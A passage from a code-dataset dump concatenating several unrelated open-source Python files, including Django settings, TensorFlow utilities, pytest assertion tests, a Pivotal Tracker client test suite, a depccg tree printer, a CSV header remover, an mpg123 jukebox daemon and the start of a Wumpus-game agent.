'debug_toolbar.panels.template.TemplateDebugPanel',
'debug_toolbar.panels.sql.SQLDebugPanel',
'debug_toolbar.panels.signals.SignalDebugPanel',
'debug_toolbar.panels.logger.LoggingPanel',
)
###############################
# LOCAL SETTINGS #
##############################
try:
from local_settings import *
except ImportError:
pass
if NO_STATIC_HASH:
ASSET_HASH = 'abcdefg'
else:
import git
repo = git.Repo(to_absolute_path('.'), odbt=git.GitCmdObjectDB)
ASSET_HASH = repo.head.commit.hexsha[0:7]
    del repo
if IS_DATAMINE:
INSTALLED_APPS += ('miner',
'gunicorn')
RELATED_SEARCH_MODEL_BASE_DIR = '/cloud/data'
LOG_LEVEL = logging.DEBUG if DEBUG else logging.INFO
LOG_FORMAT = '%(asctime)s %(levelname)s %(message)s'
logging.basicConfig(level=LOG_LEVEL, format=LOG_FORMAT)
log = logging.getLogger('jumo')
|
jumoconnect/openjumo
|
jumodjango/settings.py
|
Python
|
mit
| 8,951
|
# -*- coding:utf8 -*-
# File : tfutils.py
# Author : Jiayuan Mao
# Email : maojiayuan@gmail.com
# Date : 1/31/17
#
# This file is part of TensorArtist.
import re
import tensorflow as tf
class TArtGraphKeys:
PLACEHOLDERS = 'placeholders'
TART_VARIABLES = 'tart_variables'
INFERENCE_SUMMARIES = 'inference_summaries'
SCALAR_VARIABLES = 'scalar_variables'
OPTIMIZER_VARIABLES = 'optimizer_variables'
# DEPRECATED: (2017-12-02)
TART_OPERATORS = 'tart_operators'
def clean_name(tensor, suffix=':0'):
name = tensor.name
if name.endswith(suffix):
name = name[:-len(suffix)]
return name
def escape_name(tensor):
name = tensor.name
return re.sub(':|/', '_', name)
def clean_summary_suffix(name):
    return re.sub(r'_\d+$', '', name)
def remove_tower_name(name):
    return re.sub(r'^tower/\d+/', '', name)
def format_summary_name(name):
name = clean_summary_suffix(name)
name = remove_tower_name(name)
if 'train/' in name:
name = name.replace('train/', '')
name = 'train/' + name
return name
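# Illustrative walk-through, assuming typical TF tensor naming with
# "tower/<i>/" prefixes and "_<n>" dedup suffixes:
#   format_summary_name('tower/0/train/loss_2')
#   -> clean_summary_suffix gives 'tower/0/train/loss'
#   -> remove_tower_name gives 'train/loss'
#   -> the 'train/' prefix is stripped and re-prepended, yielding 'train/loss'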
def assign_variable(var, value, session=None, use_locking=False):
from .graph.env import get_default_env
session = session or get_default_env().session
session.run(var.assign(value, use_locking=use_locking))
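# Illustrative usage, a sketch only: given a variable `w` and a running
# TensorArtist env, assign_variable(w, 0.0) runs w.assign(0.0) in the default
# session; fetch_variable(w) below additionally initializes the variable on
# demand if it has not been initialized yet.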
def fetch_variable(var, session=None):
from .graph.env import get_default_env
session = session or get_default_env().session
try:
return session.run(var)
except tf.errors.FailedPreconditionError:
session.run(var.initializer)
return session.run(var)
def fetch_variables(var_list, session=None):
from .graph.env import get_default_env
session = session or get_default_env().session
try:
return session.run(var_list)
    except tf.errors.FailedPreconditionError as e:
        raise ValueError('Uninitialized variable(s) encountered in fetch_variables') from e
def assign_variables(var_list_or_dict, value_list=None, session=None, use_locking=False):
from .graph.env import get_default_env
session = session or get_default_env().session
assigns = []
if isinstance(var_list_or_dict, dict):
iterator = var_list_or_dict.items()
else:
iterator = zip(var_list_or_dict, value_list)
for var, value in iterator:
assigns.append(tf.assign(var, value, use_locking=use_locking, name='assign_{}'.format(escape_name(var))))
session.run(tf.group(*assigns))
def extend_collection_list(base, *others):
if base is None:
return others
if type(base) is str:
return (base, ) + others
assert isinstance(base, (tuple, list))
return tuple(base) + others
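# Illustrative behaviour:
#   extend_collection_list(None, 'a', 'b')  -> ('a', 'b')
#   extend_collection_list('base', 'a')     -> ('base', 'a')
#   extend_collection_list(['x', 'y'], 'z') -> ('x', 'y', 'z')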
|
vacancy/TensorArtist
|
tartist/nn/tfutils.py
|
Python
|
mit
| 2,691
|
import sys
import py, pytest
import _pytest.assertion as plugin
from _pytest.assertion import reinterpret, util
needsnewassert = pytest.mark.skipif("sys.version_info < (2,6)")
@pytest.fixture
def mock_config():
class Config(object):
verbose = False
def getoption(self, name):
if name == 'verbose':
return self.verbose
raise KeyError('Not mocked out: %s' % name)
return Config()
def interpret(expr):
return reinterpret.reinterpret(expr, py.code.Frame(sys._getframe(1)))
class TestBinReprIntegration:
pytestmark = needsnewassert
def test_pytest_assertrepr_compare_called(self, testdir):
testdir.makeconftest("""
l = []
def pytest_assertrepr_compare(op, left, right):
l.append((op, left, right))
def pytest_funcarg__l(request):
return l
""")
testdir.makepyfile("""
def test_hello():
assert 0 == 1
def test_check(l):
assert l == [("==", 0, 1)]
""")
result = testdir.runpytest("-v")
result.stdout.fnmatch_lines([
"*test_hello*FAIL*",
"*test_check*PASS*",
])
def callequal(left, right, verbose=False):
config = mock_config()
config.verbose = verbose
return plugin.pytest_assertrepr_compare(config, '==', left, right)
class TestAssert_reprcompare:
def test_different_types(self):
assert callequal([0, 1], 'foo') is None
def test_summary(self):
summary = callequal([0, 1], [0, 2])[0]
assert len(summary) < 65
def test_text_diff(self):
diff = callequal('spam', 'eggs')[1:]
assert '- spam' in diff
assert '+ eggs' in diff
def test_text_skipping(self):
lines = callequal('a'*50 + 'spam', 'a'*50 + 'eggs')
assert 'Skipping' in lines[1]
for line in lines:
assert 'a'*50 not in line
def test_text_skipping_verbose(self):
lines = callequal('a'*50 + 'spam', 'a'*50 + 'eggs', verbose=True)
assert '- ' + 'a'*50 + 'spam' in lines
assert '+ ' + 'a'*50 + 'eggs' in lines
def test_multiline_text_diff(self):
left = 'foo\nspam\nbar'
right = 'foo\neggs\nbar'
diff = callequal(left, right)
assert '- spam' in diff
assert '+ eggs' in diff
def test_list(self):
expl = callequal([0, 1], [0, 2])
assert len(expl) > 1
    def test_list_different_lengths(self):
expl = callequal([0, 1], [0, 1, 2])
assert len(expl) > 1
expl = callequal([0, 1, 2], [0, 1])
assert len(expl) > 1
def test_dict(self):
expl = callequal({'a': 0}, {'a': 1})
assert len(expl) > 1
def test_dict_omitting(self):
lines = callequal({'a': 0, 'b': 1}, {'a': 1, 'b': 1})
assert lines[1].startswith('Omitting 1 identical item')
assert 'Common items' not in lines
for line in lines[1:]:
assert 'b' not in line
def test_dict_omitting_verbose(self):
lines = callequal({'a': 0, 'b': 1}, {'a': 1, 'b': 1}, verbose=True)
assert lines[1].startswith('Common items:')
assert 'Omitting' not in lines[1]
assert lines[2] == "{'b': 1}"
def test_set(self):
expl = callequal(set([0, 1]), set([0, 2]))
assert len(expl) > 1
    def test_frozenset(self):
expl = callequal(frozenset([0, 1]), set([0, 2]))
assert len(expl) > 1
def test_Sequence(self):
col = py.builtin._tryimport(
"collections.abc",
"collections",
"sys")
if not hasattr(col, "MutableSequence"):
pytest.skip("cannot import MutableSequence")
MutableSequence = col.MutableSequence
class TestSequence(MutableSequence): # works with a Sequence subclass
def __init__(self, iterable):
self.elements = list(iterable)
def __getitem__(self, item):
return self.elements[item]
def __len__(self):
return len(self.elements)
def __setitem__(self, item, value):
pass
def __delitem__(self, item):
pass
def insert(self, item, index):
pass
expl = callequal(TestSequence([0, 1]), list([0, 2]))
assert len(expl) > 1
def test_list_tuples(self):
expl = callequal([], [(1,2)])
assert len(expl) > 1
expl = callequal([(1,2)], [])
assert len(expl) > 1
def test_list_bad_repr(self):
class A:
def __repr__(self):
raise ValueError(42)
expl = callequal([], [A()])
assert 'ValueError' in "".join(expl)
expl = callequal({}, {'1': A()})
assert 'faulty' in "".join(expl)
def test_one_repr_empty(self):
"""
        the faulty empty string repr did trigger
        an unbound local error in _diff_text
"""
class A(str):
def __repr__(self):
return ''
expl = callequal(A(), '')
assert not expl
def test_repr_no_exc(self):
expl = ' '.join(callequal('foo', 'bar'))
assert 'raised in repr()' not in expl
def test_python25_compile_issue257(testdir):
testdir.makepyfile("""
def test_rewritten():
assert 1 == 2
# some comment
""")
result = testdir.runpytest()
assert result.ret == 1
result.stdout.fnmatch_lines("""
*E*assert 1 == 2*
*1 failed*
""")
@needsnewassert
def test_rewritten(testdir):
testdir.makepyfile("""
def test_rewritten():
assert "@py_builtins" in globals()
""")
assert testdir.runpytest().ret == 0
def test_reprcompare_notin(mock_config):
detail = plugin.pytest_assertrepr_compare(
mock_config, 'not in', 'foo', 'aaafoobbb')[1:]
assert detail == ["'foo' is contained here:", ' aaafoobbb', '? +++']
@needsnewassert
def test_pytest_assertrepr_compare_integration(testdir):
testdir.makepyfile("""
def test_hello():
x = set(range(100))
y = x.copy()
y.remove(50)
assert x == y
""")
result = testdir.runpytest()
result.stdout.fnmatch_lines([
"*def test_hello():*",
"*assert x == y*",
"*E*Extra items*left*",
"*E*50*",
])
@needsnewassert
def test_sequence_comparison_uses_repr(testdir):
testdir.makepyfile("""
def test_hello():
x = set("hello x")
y = set("hello y")
assert x == y
""")
result = testdir.runpytest()
result.stdout.fnmatch_lines([
"*def test_hello():*",
"*assert x == y*",
"*E*Extra items*left*",
"*E*'x'*",
"*E*Extra items*right*",
"*E*'y'*",
])
@pytest.mark.xfail("sys.version_info < (2,6)")
def test_assert_compare_truncate_longmessage(testdir):
testdir.makepyfile(r"""
def test_long():
a = list(range(200))
b = a[::2]
a = '\n'.join(map(str, a))
b = '\n'.join(map(str, b))
assert a == b
""")
result = testdir.runpytest()
result.stdout.fnmatch_lines([
"*truncated*use*-vv*",
])
result = testdir.runpytest('-vv')
result.stdout.fnmatch_lines([
"*- 197",
])
@needsnewassert
def test_assertrepr_loaded_per_dir(testdir):
testdir.makepyfile(test_base=['def test_base(): assert 1 == 2'])
a = testdir.mkdir('a')
a_test = a.join('test_a.py')
a_test.write('def test_a(): assert 1 == 2')
a_conftest = a.join('conftest.py')
a_conftest.write('def pytest_assertrepr_compare(): return ["summary a"]')
b = testdir.mkdir('b')
b_test = b.join('test_b.py')
b_test.write('def test_b(): assert 1 == 2')
b_conftest = b.join('conftest.py')
b_conftest.write('def pytest_assertrepr_compare(): return ["summary b"]')
result = testdir.runpytest()
result.stdout.fnmatch_lines([
'*def test_base():*',
'*E*assert 1 == 2*',
'*def test_a():*',
'*E*assert summary a*',
'*def test_b():*',
'*E*assert summary b*'])
def test_assertion_options(testdir):
testdir.makepyfile("""
def test_hello():
x = 3
assert x == 4
""")
result = testdir.runpytest()
assert "3 == 4" in result.stdout.str()
off_options = (("--no-assert",),
("--nomagic",),
("--no-assert", "--nomagic"),
("--assert=plain",),
("--assert=plain", "--no-assert"),
("--assert=plain", "--nomagic"),
("--assert=plain", "--no-assert", "--nomagic"))
for opt in off_options:
result = testdir.runpytest(*opt)
assert "3 == 4" not in result.stdout.str()
def test_old_assert_mode(testdir):
testdir.makepyfile("""
def test_in_old_mode():
assert "@py_builtins" not in globals()
""")
result = testdir.runpytest("--assert=reinterp")
assert result.ret == 0
def test_triple_quoted_string_issue113(testdir):
testdir.makepyfile("""
def test_hello():
assert "" == '''
'''""")
result = testdir.runpytest("--fulltrace")
result.stdout.fnmatch_lines([
"*1 failed*",
])
assert 'SyntaxError' not in result.stdout.str()
def test_traceback_failure(testdir):
p1 = testdir.makepyfile("""
def g():
return 2
def f(x):
assert x == g()
def test_onefails():
f(3)
""")
result = testdir.runpytest(p1)
result.stdout.fnmatch_lines([
"*test_traceback_failure.py F",
"====* FAILURES *====",
"____*____",
"",
" def test_onefails():",
"> f(3)",
"",
"*test_*.py:6: ",
"_ _ _ *",
#"",
" def f(x):",
"> assert x == g()",
"E assert 3 == 2",
"E + where 2 = g()",
"",
"*test_traceback_failure.py:4: AssertionError"
])
@pytest.mark.skipif("sys.version_info < (2,5) or '__pypy__' in sys.builtin_module_names or sys.platform.startswith('java')" )
def test_warn_missing(testdir):
p1 = testdir.makepyfile("")
result = testdir.run(sys.executable, "-OO", "-m", "pytest", "-h")
result.stderr.fnmatch_lines([
"*WARNING*assert statements are not executed*",
])
result = testdir.run(sys.executable, "-OO", "-m", "pytest", "--no-assert")
result.stderr.fnmatch_lines([
"*WARNING*assert statements are not executed*",
])
def test_recursion_source_decode(testdir):
testdir.makepyfile("""
def test_something():
pass
""")
testdir.makeini("""
[pytest]
python_files = *.py
""")
result = testdir.runpytest("--collect-only")
result.stdout.fnmatch_lines("""
<Module*>
""")
|
geraldoandradee/pytest
|
testing/test_assertion.py
|
Python
|
mit
| 11,084
|
# -*- coding: utf-8 -*-
from tests import base
from app import pivocram
class PivocramConnectTest(base.TestCase):
def setUp(self):
self.connect = pivocram.Connect('PIVOTAL_TEST_TOKEN')
def test_should_have_the_pivotal_api_url(self):
self.connect.PIVOTAL_URL.should.be.equal('https://www.pivotaltracker.com/services/v5')
def test_should_have_header_with_token(self):
self.connect.headers.should.be.equal({'X-TrackerToken': 'PIVOTAL_TEST_TOKEN'})
def test_should_have_projects_url_for_list(self):
self.connect.projects_url().should.be.equal('https://www.pivotaltracker.com/services/v5/projects')
def test_should_have_projects_url_for_item(self):
self.connect.projects_url(123).should.be.equal('https://www.pivotaltracker.com/services/v5/projects/123')
def test_should_have_account_member_url(self):
self.connect.account_member_url(123, 333).should.be.equal('https://www.pivotaltracker.com/services/v5/accounts/123/memberships/333')
def test_should_have_iterations_url(self):
self.connect.iterations_url(123, 1).should.be.equal('https://www.pivotaltracker.com/services/v5/projects/123/iterations/1')
def test_should_have_project_story_url(self):
self.connect.project_story_url(123, 1234).should.be.equal('https://www.pivotaltracker.com/services/v5/projects/123/stories/1234')
def test_should_have_project_story_tasks_url(self):
self.connect.project_story_tasks_url(123, 1234).should.be.equal('https://www.pivotaltracker.com/services/v5/projects/123/stories/1234/tasks')
def test_should_have_project_story_task_url(self):
self.connect.project_story_task_url(123, 1234, 12345).should.be.equal('https://www.pivotaltracker.com/services/v5/projects/123/stories/1234/tasks/12345')
@base.TestCase.mock.patch('app.pivocram.requests')
def test_should_make_get(self, req_mock):
response = self.mock.MagicMock()
response.json.return_value = 'req-response'
req_mock.get.return_value = response
self.connect.get('url').should.be.equal('req-response')
req_mock.get.assert_called_with('url', headers={'X-TrackerToken': 'PIVOTAL_TEST_TOKEN'})
@base.TestCase.mock.patch('app.pivocram.requests')
def test_should_make_put(self, req_mock):
response = self.mock.MagicMock()
response.json.return_value = 'req-response'
req_mock.put.return_value = response
self.connect.put('url', {'data': 'value'}).should.be.equal('req-response')
req_mock.put.assert_called_with('url', {'data': 'value'}, headers={'X-TrackerToken': 'PIVOTAL_TEST_TOKEN'})
def test_should_get_projects_list(self):
self.connect.get = self.mock.MagicMock(return_value='req-response')
self.connect.projects_url = self.mock.MagicMock(return_value='url-projects')
self.connect.get_projects().should.be.equal('req-response')
self.connect.get.assert_called_with('url-projects')
def test_should_get_project(self):
self.connect.get = self.mock.MagicMock(return_value='req-response')
self.connect.projects_url = self.mock.MagicMock(return_value='url-projects')
self.connect.get_project(123).should.be.equal('req-response')
self.connect.get.assert_called_with('url-projects')
self.connect.projects_url.assert_called_with(123)
def test_should_get_project_member(self):
self.connect.get = self.mock.MagicMock(return_value='req-response')
self.connect.account_member_url = self.mock.MagicMock(return_value='url-project-member')
self.connect.get_account_member(123, 333).should.be.equal('req-response')
self.connect.get.assert_called_with('url-project-member')
self.connect.account_member_url.assert_called_with(123, 333)
def test_should_get_project_story_tasks(self):
self.connect.get = self.mock.MagicMock(return_value='req-response')
self.connect.project_story_tasks_url = self.mock.MagicMock(return_value='url-tasks')
self.connect.get_project_story_tasks(123, 1234).should.be.equal('req-response')
self.connect.get.assert_called_with('url-tasks')
self.connect.project_story_tasks_url.assert_called_with(123, 1234)
def test_should_get_iteration_stories(self):
self.connect.get = self.mock.MagicMock(return_value='req-response')
self.connect.iterations_url = self.mock.MagicMock(return_value='url-iterations')
self.connect.get_current_iteration(123, 1).should.be.equal('req-response')
self.connect.get.assert_called_with('url-iterations')
self.connect.iterations_url.assert_called_with(123, 1)
def test_should_update_story(self):
self.connect.put = self.mock.MagicMock(return_value='req-response')
self.connect.project_story_url = self.mock.MagicMock(return_value='url-stories')
self.connect.update_story(123, 1234, {'data': 'value'}).should.be.equal('req-response')
self.connect.put.assert_called_with('url-stories', {'data': 'value'})
self.connect.project_story_url.assert_called_with(123, 1234)
def test_should_update_story_task(self):
self.connect.put = self.mock.MagicMock(return_value='req-response')
self.connect.project_story_task_url = self.mock.MagicMock(return_value='url-stories')
self.connect.update_story_task(123, 1234, 12345, {'data': 'value'}).should.be.equal('req-response')
self.connect.put.assert_called_with('url-stories', {'data': 'value'})
self.connect.project_story_task_url.assert_called_with(123, 1234, 12345)
class PivocramClientTest(base.TestCase):
project_mock = {"current_iteration_number": 1}
def setUp(self):
user = self.mock.MagicMock()
user.pivotal_token = 'PIVOTAL_TEST_TOKEN'
self.client = pivocram.Client(user, project_id='PROJECT-ID')
def test_should_have_connect_attribute(self):
self.assertTrue(isinstance(self.client.connect, pivocram.Connect))
def test_should_be_create_with_project_id(self):
self.client.project_id.should.be.equal('PROJECT-ID')
def test_should_have_property_list_stories(self):
self.client._current_iteration = 'CURRENT'
self.client.current_iteration.should.be.equal('CURRENT')
def test_should_have_method_to_get_story(self):
self.client.get_story('STORY-ID').should.be.equal(None)
def test_should_have_method_to_list_story_tasks(self):
self.client.connect = self.mock.MagicMock()
self.client.connect.get_project_story_tasks.return_value = [1, 2, 3]
self.client.get_story_tasks('STORY-ID').should.be.equal([1, 2, 3])
self.client.connect.get_project_story_tasks.assert_called_with('PROJECT-ID', 'STORY-ID')
def test_should_have_method_to_get_story_task(self):
self.client.get_story_task('STORY-ID', 'TASKS-ID').should.be.equal(None)
def test_should_get_projects(self):
self.client.connect = self.mock.MagicMock()
self.client.connect.get_projects.return_value = [1, 2, 3]
self.client.get_projects().should.be.equal([1, 2, 3])
def test_should_get_empty_if_no_projects(self):
self.client.connect = self.mock.MagicMock()
self.client.connect.get_projects.return_value = []
self.client.get_projects().should.be.equal([])
def test_should_set_current_iteration(self):
self.client.connect = self.mock.MagicMock()
self.client.connect.get_project.return_value = self.project_mock
self.client._current_iteration_number = None
self.client.current_iteration_number.should.be.equal(1)
self.client.connect.get_project.assert_called_with('PROJECT-ID')
def test_should_get_current_stories(self):
self.client.connect = self.mock.MagicMock()
self.client.connect.get_current_iteration.return_value = {'stories': [1, 2, 3]}
self.client.current_iteration.should.be.equal({'stories': [1, 2, 3]})
def test_should_update_story(self):
self.client.connect = self.mock.MagicMock()
self.client.connect.update_story.return_value = {'id': 1234}
self.client.update_story(1234, {'data': 'value'}).should.be.equal({'id': 1234})
def test_should_complete_story_task(self):
self.client.connect = self.mock.MagicMock()
self.client.connect.update_story_task.return_value = {'id': 1234}
self.client.complete_story_task(1234, 12345, {'data': 'value'}).should.be.equal({'id': 1234})
|
Maethorin/pivocram
|
tests/unit/test_pivocram.py
|
Python
|
mit
| 8,498
|
"""
Django settings for TaskTracker project.
Generated by 'django-admin startproject' using Django 1.9.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '!ojo^0p3t2kj096an0ep+uise$z$)0qrhjbz-9621w-7takmmt'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'debug_toolbar',
'bootstrap3',
'homepage.apps.HomepageConfig',
'tasks.apps.TasksConfig',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'TaskTracker.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'TaskTracker.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME':
'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Prague'
USE_I18N = True
USE_L10N = False
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static'),
]
# Date and datetime default formatting
DATE_FORMAT = 'd. m. Y'
DATETIME_FORMAT = 'd. m. Y H:i'
# Login URL
LOGIN_URL = 'homepage-login'
|
polarkac/TaskTracker
|
TaskTracker/settings.py
|
Python
|
mit
| 3,566
|
from typing import Dict, Any
from depccg.tree import Tree
from depccg.cat import Category
def _json_of_category(category: Category) -> Dict[str, Any]:
def rec(node):
if node.is_functor:
return {
'slash': node.slash,
'left': rec(node.left),
'right': rec(node.right)
}
else:
feature = node.features
return {
'base': node.base,
'feature': feature if len(feature) > 0 else None
}
return rec(category)
def json_of(
tree: Tree,
full: bool = False
) -> Dict[str, Any]:
"""a tree in Python dict object.
Args:
tree (Tree): tree object
full (bool): whether to decomopose categories into its components, i.e.,
{
'slash': '/',
'left': {'base': 'S', 'feature': 'adj'},
'right': {'base': 'NP', 'feature': None},
},
or just as a string "S[adj]/NP".
Returns:
str: tree string in the CoNLL format
"""
def rec(node: Tree) -> Dict[str, Any]:
if node.is_leaf:
res = dict(node.token)
res['cat'] = _json_of_category(node.cat) if full else str(node.cat)
return res
else:
return {
'type': node.op_string,
'cat': _json_of_category(node.cat) if full else str(node.cat),
'children': [rec(child) for child in node.children]
}
return rec(tree)
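# Illustrative output shape (hypothetical: the leaf keys come from the Token
# object, and 'fa' is just an example op_string):
#   json_of(tree) -> {'type': 'fa', 'cat': 'S[adj]/NP', 'children': [
#       {'word': 'happy', 'cat': 'S[adj]/NP', ...}]}
# With full=True the 'cat' values become the nested dicts documented above.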
|
masashi-y/depccg
|
depccg/printer/my_json.py
|
Python
|
mit
| 1,555
|
"""
WSGI config for genoome project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
from os.path import abspath, dirname
from sys import path
SITE_ROOT = dirname(dirname(abspath(__file__)))
path.append(SITE_ROOT)
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "jajaja.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "genoome.settings.development")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
|
jiivan/genoomy
|
genoome/genoome/wsgi.py
|
Python
|
mit
| 1,563
|
#! python3
"""Remove CSV header
Removes the header from all CSV files in the current working directory.
Note:
Outputs to ``./headerRemoved`` directory.
"""
def main():
import csv, os
os.makedirs('headerRemoved', exist_ok=True)
# Loop through every file in the current working directory.
for csvFilename in os.listdir('.'):
if not csvFilename.endswith(".csv"):
continue # skip non-csv files
print("Removing header from " + csvFilename + "...")
# Read the CSV file in (skipping first row).
csvRows = []
csvFileObj = open(csvFilename)
readerObj = csv.reader(csvFileObj)
for row in readerObj:
if readerObj.line_num == 1:
continue # skip first row
csvRows.append(row)
csvFileObj.close()
# Write out the CSV file.
csvFileObj = open(os.path.join('headerRemoved', csvFilename), 'w', newline='')
csvWriter = csv.writer(csvFileObj)
for row in csvRows:
csvWriter.writerow(row)
csvFileObj.close()
if __name__ == '__main__':
main()
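# Example run: with a spam.csv (hypothetical filename) containing a header row
# in the current directory, running this script writes headerRemoved/spam.csv
# with the first row removed; files not ending in .csv are skipped.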
|
JoseALermaIII/python-tutorials
|
pythontutorials/books/AutomateTheBoringStuff/Ch14/P3_removeCsvHeader.py
|
Python
|
mit
| 1,125
|
# -*- coding: utf-8 -*-
from redmine import Redmine
from feedbacks import settings
from base import IBackend
class RedmineBackend(IBackend):
def __init__(self):
self.redmine = Redmine(settings.DJFEEDBACK_REDMINE_URL,
key=settings.DJFEEDBACK_REDMINE_KEY)
self.project_id = settings.DJFEEDBACK_REDMINE_PROJECT_ID
def post(self, message):
tracker = message.ftype.ftype
if tracker is None:
tracker = 'bug'
email_field_id = settings.DJFEEDBACK_REDMINE_EMAIL_FIELD_ID
custom_fields = [
{
'id': email_field_id,
'value': message.email
}
]
self.redmine.issue.create(
project_id=self.project_id,
tracker_id=settings.DJFEEDBACK_REDMINE_TRACKERS[tracker],
subject=message.subj,
description=message.text,
assigned_to_id=settings.DJFEEDBACK_REDMINE_ASSIGN_TO_ID,
custom_fields=custom_fields
)
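# Illustrative usage, a sketch only; assumes the DJFEEDBACK_* settings are
# configured and that `message` carries the .ftype.ftype, .email, .subj and
# .text attributes read above:
#   backend = RedmineBackend()
#   backend.post(message)  # files an issue in the configured Redmine project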
|
mpyatishev/djfeedback
|
feedbacks/backends/redmine_backend.py
|
Python
|
mit
| 1,037
|
# -*- coding: UTF-8 -*-
from django.core.management.base import BaseCommand
from optparse import make_option
import daemon
import daemon.pidfile
from signal import SIGTSTP, SIGTERM, SIGABRT
import sys, os, subprocess
import time
from jukebox.jukebox_core import api
class Command(BaseCommand):
daemon = None
proc = None
mpg123 = None
option_list = BaseCommand.option_list + (
make_option(
"--start",
action="store_true",
dest="start",
help="Start mpg123 playback"
),
make_option(
"--stop",
action="store_true",
dest="stop",
help="Stop mpg123 playback"
),
)
def handle(self, *args, **options):
# check if mpg123 is available
fin, fout = os.popen4(["which", "mpg123"])
self.mpg123 = fout.read().replace("\n", "")
if not len(self.mpg123):
print "mpg123 is not installed"
return
pidFile = os.path.dirname(
os.path.abspath(__file__)
) + "/../../daemon.pid"
if options["start"]:
if os.path.exists(pidFile):
print "Daemon already running, pid file exists"
return
pid = daemon.pidfile.TimeoutPIDLockFile(
pidFile,
10
)
print "Starting jukebox_mpg123 daemon..."
self.daemon = daemon.DaemonContext(
uid=os.getuid(),
gid=os.getgid(),
pidfile=pid,
working_directory=os.getcwd(),
detach_process=True,
signal_map={
SIGTSTP: self.shutdown,
SIGABRT: self.skipSong
}
)
with self.daemon:
print "Register player"
pid = int(open(pidFile).read())
players_api = api.players()
players_api.add(pid)
self.play()
elif options["stop"]:
if not os.path.exists(pidFile):
print "Daemon not running"
return
print "Stopping daemon..."
pid = int(open(pidFile).read())
os.kill(pid, SIGTSTP)
print "Unregister player " + str(pid)
players_api = api.players()
players_api.remove(pid)
else:
self.print_help("jukebox_mpg123", "help")
def play(self):
songs_api = api.songs()
while 1:
if self.proc is None:
song_instance = songs_api.getNextSong()
if not os.path.exists(song_instance.Filename):
print "File not found: %s" % song_instance.Filename
continue
print "Playing " + song_instance.Filename
self.proc = subprocess.Popen(
[self.mpg123, song_instance.Filename]
)
else:
if not self.proc.poll() is None:
self.proc = None
time.sleep(0.5)
def shutdown(self, signal, action):
if not self.proc is None:
os.kill(self.proc.pid, SIGTERM)
if not self.daemon is None:
self.daemon.close()
sys.exit(0)
def skipSong(self, signal, action):
if not self.proc is None:
os.kill(self.proc.pid, SIGTERM)
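# Signal protocol: per the signal_map in handle(), SIGTSTP asks the daemon to
# shut down cleanly (shutdown above), while SIGABRT only kills the current
# mpg123 child so the play() loop moves on to the next song.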
|
lociii/jukebox_mpg123
|
jukebox_mpg123/management/commands/jukebox_mpg123.py
|
Python
|
mit
| 3,441
|
# Example agent for the 'lost Wumpus' task. The agent moves across the board in a snake pattern.
import random
from action import Action
# do not change the class name
class Agent:
    # do not change the constructor signature; this is where the agent receives all information about the environment
def __init__(self, p, pj, pn, height, width, areaMap):
self.times_moved = 0
self.direction = Action.LEFT
# w ten sposob mozna zapamietac zmienne obiektu
self.p = p
self.pj = pj
self.pn = pn
self.height = height
self.width = width
self.map = areaMap
        # in this example the histogram is filled so that a gradient appears across the board
self.hist = []
for y in range(self.height):
self.hist.append([])
for x in range(self.width):
self.hist[y].append(float(y + x) / (self.width + self.height - 2))
        # add the rest of the agent initialization here
return
    # do not change the method signature; this is where the agent observes the world
    # the sensor takes the value True when the agent has the feeling of standing in a pit
